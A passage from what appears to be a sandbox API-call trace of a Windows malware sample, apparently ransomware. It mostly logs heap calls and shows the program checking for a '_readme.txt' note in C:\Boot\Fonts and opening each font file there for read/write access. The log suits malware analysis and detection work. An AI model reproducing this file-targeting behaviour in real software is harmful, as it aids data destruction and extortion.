lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.978] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0129.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.978] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0129.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0129.978] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.978] PathFindFileNameW (pszPath="") returned="" [0129.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.978] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.979] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0129.979] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0129.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0129.979] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2280 [0129.979] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0129.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.980] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0129.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.980] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.980] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37fa1e0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37fa1e0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.980] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37fa1e0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37fa1e0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.980] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0129.980] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.980] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.980] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0129.981] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.981] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0129.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.981] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0129.981] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.982] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0129.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.982] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0129.983] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.983] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0129.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.983] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0129.983] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.983] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0129.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.983] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0129.983] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.983] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37fa1e0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37fa1e0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37fa1e0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.984] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned=".txt" [0129.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.984] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37fa1e0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37fa1e0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37fa1e0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.984] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0129.984] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0129.984] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.985] HeapFree (in: 